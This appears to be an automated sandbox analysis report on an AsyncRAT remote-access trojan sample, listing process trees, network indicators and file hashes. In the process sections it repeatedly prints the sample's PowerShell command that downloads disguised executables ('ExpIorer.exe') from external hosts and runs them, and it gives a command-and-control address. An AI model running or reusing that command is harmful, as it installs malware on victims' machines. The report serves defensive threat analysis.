Malware Analysis Report

2025-01-02 12:12

Sample ID 240417-nqkmvadd89
Target 2e5d5abda2f010c8c2cceeb6ff027cc3.exe
SHA256 a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392
Tags
rat default asyncrat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a16509e5f47dfc723e8ac146aef92046a65551452c9692d443dfa64fcc879392

Threat Level: Known bad

The file 2e5d5abda2f010c8c2cceeb6ff027cc3.exe was found to be: Known bad.

Malicious Activity Summary

rat default asyncrat

Async RAT payload

AsyncRat

Asyncrat family

Checks computer location settings

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-17 11:36

Signatures

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Asyncrat family

asyncrat

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-17 11:36

Reported

2024-04-17 11:38

Platform

win7-20240215-en

Max time kernel

146s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"

Signatures

AsyncRat

rat asyncrat

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2952 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe C:\Windows\System32\cmd.exe
PID 2952 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe C:\Windows\System32\cmd.exe
PID 2952 wrote to memory of 3052 N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe C:\Windows\System32\cmd.exe
PID 3052 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2760 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2444 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2444 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2444 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 2612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 304 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 304 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 304 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe

"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

Network

Country Destination Domain Proto
FR 51.254.53.24:4449 tcp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp

Files

memory/2952-0-0x0000000000070000-0x0000000000088000-memory.dmp

memory/2952-1-0x000007FEF5CB0000-0x000007FEF669C000-memory.dmp

memory/2952-3-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2760-9-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp

memory/2760-8-0x000000001B6A0000-0x000000001B982000-memory.dmp

memory/2760-10-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/2760-11-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp

memory/2760-12-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2760-13-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2760-14-0x0000000002A10000-0x0000000002A90000-memory.dmp

memory/2952-15-0x00000000778A0000-0x0000000077A49000-memory.dmp

memory/2760-16-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 8d54200180804576414e8d710472b1f0
SHA1 54b14e2effe390f925c72eff8428411865c5323f
SHA256 8a97c800af4a71ad7e0699c8c7a8b096631d3bd7745d98110fb9f294255e4344
SHA512 bea043a056c53c2f51684f86ed9e1b1e8661631403e805358752e582d9acbdc94ccb8b6e5d91a2df2cb0969e89b7d5dcd0a73b04a02202daab78a38f300ea6e6

memory/2444-22-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

memory/2444-24-0x0000000002B40000-0x0000000002BC0000-memory.dmp

memory/2444-23-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

memory/2444-26-0x0000000001F70000-0x0000000001F78000-memory.dmp

memory/2444-25-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

memory/2444-29-0x0000000002B40000-0x0000000002BC0000-memory.dmp

memory/2444-28-0x0000000002B40000-0x0000000002BC0000-memory.dmp

memory/2444-27-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

memory/2444-30-0x0000000002B40000-0x0000000002BC0000-memory.dmp

memory/2444-31-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2612-38-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp

memory/2612-39-0x0000000002A20000-0x0000000002AA0000-memory.dmp

memory/2612-40-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp

memory/2612-42-0x0000000002A20000-0x0000000002AA0000-memory.dmp

memory/2612-41-0x0000000002A20000-0x0000000002AA0000-memory.dmp

memory/2952-43-0x000007FEF5CB0000-0x000007FEF669C000-memory.dmp

memory/2612-44-0x0000000002A20000-0x0000000002AA0000-memory.dmp

memory/2952-45-0x000000001AE40000-0x000000001AEC0000-memory.dmp

memory/2612-46-0x000007FEEDDD0000-0x000007FEEE76D000-memory.dmp

memory/304-52-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

memory/304-53-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/304-55-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/304-54-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

memory/304-56-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/304-57-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/304-58-0x000007FEED430000-0x000007FEEDDCD000-memory.dmp

memory/2952-59-0x00000000778A0000-0x0000000077A49000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-17 11:36

Reported

2024-04-17 11:38

Platform

win10v2004-20240412-en

Max time kernel

146s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"

Signatures

AsyncRat

rat asyncrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe

"C:\Users\Admin\AppData\Local\Temp\2e5d5abda2f010c8c2cceeb6ff027cc3.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExpIorer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\ExplIorer.exe'

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 xcu.exgaming.click udp
US 8.8.8.8:53 xcu5.exgaming.click udp
FR 51.254.53.24:4449 tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
FR 51.254.53.24:4449 tcp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
FR 51.254.53.24:4449 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
FR 51.254.53.24:4449 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp
FR 51.254.53.24:4449 tcp

Files

memory/4228-0-0x0000000000D70000-0x0000000000D88000-memory.dmp

memory/4228-1-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp

memory/4228-3-0x0000000002E30000-0x0000000002E40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bunyhk2y.lbc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3972-15-0x000002343CF00000-0x000002343CF10000-memory.dmp

memory/3972-14-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp

memory/3972-13-0x00000234557B0000-0x00000234557D2000-memory.dmp

memory/3972-16-0x000002343CF00000-0x000002343CF10000-memory.dmp

memory/3972-17-0x000002343CF00000-0x000002343CF10000-memory.dmp

memory/3972-20-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 e52ff3673869a8c21697e9cc80b586a9
SHA1 d86961b3dcd781a87ad6360bd69c0e4ad6ad3456
SHA256 4263e18a993ae6da36463829ecf6f02b13035555a6f83c6f9aa048cf1151f7cc
SHA512 70e7ffc8794613d45666be095dcdb22cea7b7ea27a910cdaee1f1d3a7e313b3b0cbf5bb0889cfa4cc9b7b93963302d259d73f7ed315b15f5d8d11c0e6b1d7ead

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 eab4488871ac8f99a41386e5ffbb78ff
SHA1 552887e75c58595744ff3cbc0fcf0b0ef855b0aa
SHA256 dbff195e70764404bf89dd342f6eb991e377292f7de93f4791d397d2621dd279
SHA512 5670d6c233702f066776a44e7d194b9f388e02002b975fdfbc38ee0a41d778307e80a62678e26bee68a3b1aa11ca67c297408c5880abaa7cf3a70e00d7b09bfc

memory/2568-32-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp

memory/2568-33-0x000001DB69450000-0x000001DB69460000-memory.dmp

memory/2568-34-0x000001DB69450000-0x000001DB69460000-memory.dmp

memory/2568-35-0x000001DB69450000-0x000001DB69460000-memory.dmp

memory/2568-37-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp

memory/3464-38-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp

memory/3464-39-0x00000274E6050000-0x00000274E6060000-memory.dmp

memory/3464-40-0x00000274E6050000-0x00000274E6060000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ab6a608d425ee999e520555e510f2856
SHA1 e8da9bcbd7dbf6cbe542cd27a683f27811851822
SHA256 44fb5a8164271cda3525070f3fa5f1b86db92ec1c3011f3233b7fce5126826b2
SHA512 3b5c9486b6da018a20c3d42876e821bff0560a5a51e0ede165ac5a2ef7e1f5152bd56e0e7849f4a92f2a3873bcec62afc84cb680a8d1adf42016dce00bacfb87

memory/3464-51-0x00000274E6050000-0x00000274E6060000-memory.dmp

memory/3464-53-0x00000274FE550000-0x00000274FE76C000-memory.dmp

memory/3464-54-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp

memory/4228-55-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ff65cdc439b64c97f807c217688786aa
SHA1 d57bd6d0a7390ede6056c768c7b0ad8249de554c
SHA256 d24255ef8f08aa0d0a35ba6371737ca124c5b421f3797e5cbd7838d3a746fb51
SHA512 75fce51496590db3fd58aad8dc1397760a2ac2c821649489ac12cf0ec754012186c6ecc177efa8c08ddeec3d3f47a7ef24f5e1f1b6380ddc59434293b4e5dd25

memory/4920-66-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp

memory/4228-69-0x0000000002E30000-0x0000000002E40000-memory.dmp

memory/4920-67-0x0000024071180000-0x0000024071190000-memory.dmp

memory/4920-68-0x0000024071180000-0x0000024071190000-memory.dmp

memory/4920-71-0x00007FF9F01A0000-0x00007FF9F0C61000-memory.dmp